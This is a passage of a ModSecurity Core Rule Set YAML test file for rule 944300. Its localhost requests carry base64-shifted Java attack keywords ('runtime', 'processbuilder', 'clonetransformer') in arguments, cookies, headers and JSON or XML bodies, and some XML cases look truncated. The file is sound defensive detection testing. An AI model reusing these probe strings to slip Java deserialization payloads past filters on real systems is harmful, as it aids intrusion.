"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BydW50aW1l\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-32 + desc: "Content-Type application/json arg name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BydW50aW1l\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-33 + desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-34 + desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-35 + desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvY2Vzc2J1aWxkZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-36 + desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvY2Vzc2J1aWxkZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-37 + desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvY2Vzc2J1aWxkZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-38 + desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-39 + desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-40 + desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-41 + desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-42 + desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-43 + desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-44 + desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-45 + desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-46 + desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb2Nlc3NidWlsZGVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-47 + desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb2Nlc3NidWlsZGVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-48 + desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb2Nlc3NidWlsZGVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-49 + desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-50 + desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-51 + desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-52 + desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-53 + desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-54 + desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-55 + desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-56 + desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-57 + desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm9jZXNzYnVpbGRlcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-58 + desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm9jZXNzYnVpbGRlcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-59 + desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm9jZXNzYnVpbGRlcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-60 + desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-61 + desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-62 + desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-63 + desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-64 + desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-65 + desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-66 + desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-67 + desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-68 + desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-69 + desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-70 + desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-71 + desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-72 + desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-73 + desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-74 + desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-75 + desc: "Content-Type application/json arg value includes keyword 